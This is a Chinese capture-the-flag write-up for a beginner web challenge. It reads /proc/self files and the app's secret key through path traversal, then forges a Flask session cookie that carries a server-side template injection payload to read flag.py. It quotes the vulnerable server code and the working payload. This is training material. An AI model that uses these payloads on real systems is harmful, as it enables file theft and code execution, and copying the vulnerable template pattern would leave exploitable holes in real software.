NU1LCTFer的成长之路-web入门-任意文件读取漏洞-afr_3-wp

afr_3

NU1LCTFer的成长之路-web入门-任意文件读取漏洞-afr_3-wp

考查内容:对linux系统中/proc/目录下文件作用的了解,同时考查了flask模板注入

请求 http://192.168.60.134/article?name=…/…/…/…/…/proc/self/cmdline获取当前执行系统命令,得到

NU1LCTFer的成长之路-web入门-任意文件读取漏洞-afr_3-wp

查看源代码,中间有个空格的

python server.py

请求 http://192.168.60.134/article?name=…/…/…/…/…/proc/self/cwd/server.py获取源码

@app.route("/n1page", methods=["GET", "POST"])
def n1page():
    if request.method != "POST":
        return redirect(url_for("index"))
    n1code = request.form.get("n1code") or None
    if n1code is not None:
        n1code = n1code.replace(".", "").replace("_", "").replace("{","").replace("}","")
    if "n1code" not in session or session['n1code'] is None:
        session['n1code'] = n1code
    template = None
    if session['n1code'] is not None:
     '''
     这里存在SSTI
     '''
        template = '''<h1>N1 Page</h1> <div class="row> <div class="col-md-6 col-md-offset-3 center"> Hello : %s, why you don't look at our <a href='/article?name=article'>article</a>? </div> </div> ''' % session['n1code']
        session['n1code'] = None
    return render_template_string(template)

发现flag在flag.py,flask的appkey在key.py,但是此处任意文件读取漏洞被过滤了关键词flag

源码里存在flask SSTI,前提是可以伪造flask的cookie,这里需要用到appkey https://noraj.github.io/flask-session-cookie-manager/

请求 http://192.168.60.134/article?name=…/…/…/…/…/proc/self/cwd/key.py获取appkey

  1. 伪造cookie为SSTI的payload获取flag.
{{''.__class__.__mro__[2].__subclasses__()[40]('flag.py').read()}}
上一篇:NU1LCTFer的成长之路-web入门-任意文件读取漏洞-afr_1-wp


下一篇:NU1LCTFer的成长之路-web入门-信息收集-粗心的小李-wp